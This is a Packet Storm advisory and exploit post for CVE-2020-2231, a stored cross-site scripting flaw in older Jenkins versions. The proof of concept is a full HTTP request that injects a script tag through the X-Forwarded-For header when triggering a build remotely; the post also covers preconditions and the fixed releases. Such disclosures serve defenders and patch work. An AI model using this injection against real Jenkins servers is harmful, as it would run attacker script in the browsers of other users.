what you don't know can hurt you

Jenkins 2.251 / LTS 2.235.3 Cross Site Scripting

Jenkins 2.251 / LTS 2.235.3 Cross Site Scripting
Posted Dec 18, 2020
Authored by gx1

Jenkins versions 2.251 and below and LTS 2.235.3 and below suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2020-2231
SHA-256 | fe78de531ac764992ae8de65e10f60a4d5a3ae82a3af279a85c1daa0d31531ec

Jenkins 2.251 / LTS 2.235.3 Cross Site Scripting

Change Mirror Download
# Exploit Title: Jenkins Stored XSS vulnerability in 'Trigger builds remotely'
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2231



# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
https://www.openwall.com/lists/oss-security/2020/08/12/4


Vendor Description:

Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely'.
This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token.
Jenkins 2.252, LTS 2.235.4 escapes the remote address of the host.



Technical Details and Exploitation:

When a build of a project is completed, Jenkins returns a message in completed build process. Build process is present in build history view.
The message reflects the username, for example "Started by user gx1".
Anyway, when 'Trigger builds remotely feature' is enabled, instead of the username the remote client IP is reflected, i.e.:
Started by remote host '<client-ip-address>'.
To understand how remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493
The message "Start by remote <client-ip-address> is not escaped. This could seem without security issues because the user cannot change the remote IP, right? This is not completely true... when the application server is behind a proxy, "remote client IP" is not available, as the request comes from the proxy.
In these cases, X-Headers are used to allow the application server to understand the real client information. A common header is X-Forwarded-For: X-Forwarded-For HTTP header is inserted by load balancers into the data stream to identify the address of the connecting client system.

To exploit the vulnerability several conditions should be met:
- Remote build should be enabled and if needed the attackers should have obtained API authentication token or should have Job/Configure permission
- Application server that hosts Jenkins should use some X-Header to override client IP. This happens often, because usually the application server is under proxy, and in order to obtain client IP, override mechanisms are used.
For example, in Apache Tomcat, it is possible to configure X-Forwarded-For heaer processing, as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html.

Proof Of Concept:

1. Identify the X-Header that is used by the Application Server to override proxy ip. Let's suppose that "X-Forwarded-For" is used. In this condition, the attacker can inject malicious payloads in "X-Forwarded-For" header value to exploit the vulnerability;
2. Send the following request:


GET /job/<project_name>/build?token=<token> HTTP/1.1
Host: <jenkins_host>:8080
X-Forwarded-For: gx1<script>alert(1);</script>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686
Connection: close

HTTP/1.1 201
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Location: http://<vulnenv>:8080/jenkins/queue/item/7/
Content-Length: 0
Date: Fri, 11 Dec 2020 17:04:06 GMT
Connection: close

<project_name> is the project that can be remotely built by using <token>.



3. To trigger the XSS, navigate the build item present in the build history when the build is finished. For example, if the build current finished process is #16, stored XSS is present in
http://<jenkins_host>/job/<project_name>/16/




Solution:

The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close